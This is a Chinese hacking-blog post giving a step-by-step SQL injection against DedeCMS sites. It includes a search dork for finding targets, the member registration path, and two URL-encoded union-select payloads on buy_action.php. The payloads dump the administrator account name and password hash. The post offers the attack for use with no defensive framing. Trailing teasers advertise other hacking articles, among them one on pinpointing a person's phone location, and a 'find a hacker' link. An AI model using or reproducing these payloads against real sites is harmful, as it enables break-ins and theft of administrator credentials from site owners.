dedecms注入爆管理员用户密码 ***

hacker5年前 (2020-05-31)黑客文章1032

关键词：powered by dedecms

首先注册个用户,注册地址:
/member/index_do.php?fmdo=user&dopost=regnew

爆管理帐号:
/member/buy_action.php?product=member&pid=1%20and%201=11%20union

%20select%201,2,userid,4,5%20from%20%23@__admin/*

爆管理员密码
/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20

select%201,2,substring(pwd,9,16),4,5%20from%20%23@__admin/*

标签: 黑客技术

返回列表

之前写的几个后台拿shell，Discuz!忽略了，但新版本Discuz! X3.1 Release 20140301实际上有所加强，但是真的修复了之前提到的问题吗？ Discuz!大概做了下面几...

什么叫GDB？ GDB或GNU Project程序调试是一种网络信息安全数据加密/黑客工具，容许客户在运作时在网络技术应用程序流程或程序流程（手机软件）中开展财务审计和发觉。GDB针对开发者或程序猿...

黑客便是假借黑客名义操控别人电脑的黑客技能，咱们都知道手机有定位功能，但咱们并不知道如何定位手机号码，那么今日黑客教你定位手机号码以及手机号码定位软件下载。只是经过一个手机号，就能够精确认位出你的...

如何避免自己的电脑成为“肉鸡”的几种方法，大家一起分享。 1.关闭高危端口：第一步，点击“开始”菜单/设置/控制面板/管理工具，双击打开“本地安全策略”，选中“IP 安全策略，在本地...

Autopsy 汉语翻译回来也叫“验尸”；什么叫验尸？验尸是一种在GUI工作环境的数据调查取证服务平台。“The Sleuth Kit（TSK）”库文件的验尸工作中是一组cmd调查...

成为肉鸡后的自救方法，我们一起分享。一、正在上网的用户，发现异常应首先马上断开连接如果你发现IE经常询问是你是否运行某些ActiveX控件，或是生成莫名其妙的文件、询问调试脚本什么...

找黑客平台